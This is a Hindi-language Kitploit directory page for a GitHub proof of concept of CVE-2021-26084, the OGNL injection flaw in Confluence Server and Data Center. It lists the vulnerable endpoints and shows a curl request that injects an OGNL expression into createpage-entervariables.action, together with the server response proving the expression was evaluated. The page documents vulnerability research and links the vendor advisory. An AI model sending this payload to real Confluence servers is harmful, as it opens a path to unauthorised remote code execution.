Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-26084_PoC — CVE-2021-26084 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Confluence Server और Data Center में एक OGNL इंजेक्शन भेद्यता है, जो बिना प्रमाणीकरण के रिमोट कोड निष्पादन को प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/alt3kx/cve-2021-26084_poc
पेलोड जनरेशनभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubalt3kx/cve-2021-26084_poc

CVE-2021-26084_PoC

CVE-2021-26084 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Confluence Server और Data Center में एक OGNL इंजेक्शन भेद्यता है, जो बिना प्रमाणीकरण के रिमोट कोड निष्पादन को प्रदर्शित करता है।

रिपॉजिटरी देखें
5316545 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-26084 (PoC) | Confluence Server Webwork OGNL इंजेक्शन

एक OGNL इंजेक्शन भेद्यता मौजूद है जो एक प्रमाणित उपयोगकर्ता, और कुछ मामलों में अप्रमाणित उपयोगकर्ता को, Confluence Server या Data Center इंस्टेंस पर मनमाना कोड निष्पादित करने की अनुमति देगी।

poc

प्रवेश बिंदुओं और इंजेक्शनों का पता लगाने की मेरी लड़ाई XD

लड़ाई (1)लड़ाई (2)
2021_09_01_00_37_23_Oops_an_error_has_occurred_Confluence_Chromium2021_09_01_00_40_42_Oops_an_error_has_occurred_Confluence_Chromium

अंततः Confluence प्रवेश बिंदुओं का शोषण किया गया

https://<REDACTED>/users/user-dark-features
https://<REDACTED>/login
https://<REDACTED>/pages/templates2/viewpagetemplate.action
https://<REDACTED>/template/custom/content-editor
https://<REDACTED>/templates/editor-preload-container
https://<REDACTED>/pages/createpage-entervariables.action

मेरा पहला मैन्युअल निरीक्षण: नोट: पूर्व-प्रमाणित उपयोगकर्ता

# curl -i -s -k -X $'POST' -H $'Host: <REDACTED>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 44' -b $'JSESSIONID=<REDACTED>' --data-binary $'queryString=alt3kx\\u0027%2b#{6*666}%2b\\u0027' $'https://<REDACTED>/pages/createpage-entervariables.action'

सर्वर प्रतिक्रिया: 

HTTP/1.1 200 
X-ASEN: <REDACTED>
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<REDACTED>

[../snip]
<input type="hidden" name="queryString" value="alt3kx{3996=null}" />

संदर्भ:

https://jira.atlassian.com/browse/CONFSERVER-67940
https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html

अद्भुत राइटअप यहाँ पोस्ट किया गया:
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

कुछ बहुत उपयोगी संकेत द्वारा:
@wvuuuuuuuuuuuuu
@iamnoooob

लेखक

Alex Hernandez उर्फ (@_alt3kx_)

टूल डाउनलोड करें